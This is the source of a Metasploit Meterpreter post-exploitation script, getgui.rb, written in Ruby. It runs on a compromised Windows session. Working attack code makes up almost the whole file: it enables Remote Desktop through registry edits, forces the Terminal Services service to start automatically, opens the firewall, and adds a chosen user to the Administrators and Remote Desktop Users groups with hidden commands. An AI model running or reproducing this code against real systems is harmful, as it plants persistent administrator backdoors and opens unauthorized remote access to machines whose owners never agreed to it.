metasploit-framework/scripts/meterpreter/getgui.rb

173 lines
5.0 KiB
Ruby

#!/usr/bin/env ruby
#
#Meterpreter script for enabling Remote Desktop on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Note: Port Forwarding option provided by Natron at natron[at]invisibledenizen.org
# We are still working in making this option more stable.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable RDP only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def enablerd(session)
key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'
root_key, base_key = session.sys.registry.splitkey(key)
value = "fDenyTSConnections"
begin
open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
v = open_key.query_value(value)
print_status "Enabling Remote Desktop"
if v.data == 1
print_status "\tRDP is disabled enabling it ..."
open_key = session.sys.registry.open_key(root_key, base_key, KEY_WRITE)
open_key.set_value(value, session.sys.registry.type2str("REG_DWORD"), 0)
else
print_status "\tRDP is already enabled"
end
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
def enabletssrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Terminal Services service startup mode"
if v2.data != 2
print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config termservice start= auto', "sc start termservice", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTerminal Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set service type = remotedesktop mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Remote Desktop Users"
r = session.sys.process.execute("net localgroup \"Remote Desktop Users\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
module PortForwardTracker
def cleanup
super
if pfservice
pfservice.deref
end
end
attr_accessor :pfservice
end
def message
print_status "Windows Remote Desktop Configuration Meterpreter Script by Darkoperator"
print_status "Carlos Perez carlos_perez@darkoperator.com"
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
print(
"Windows Remote Desktop Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
)
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
enablerd(session)
enabletssrv(session)
elsif usr!= nil && pass != nil
message
enablerd(session)
enabletssrv(session)
addrdpusr(session, usr, pass)
else
print(
"Windows Remote Desktop Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage)
end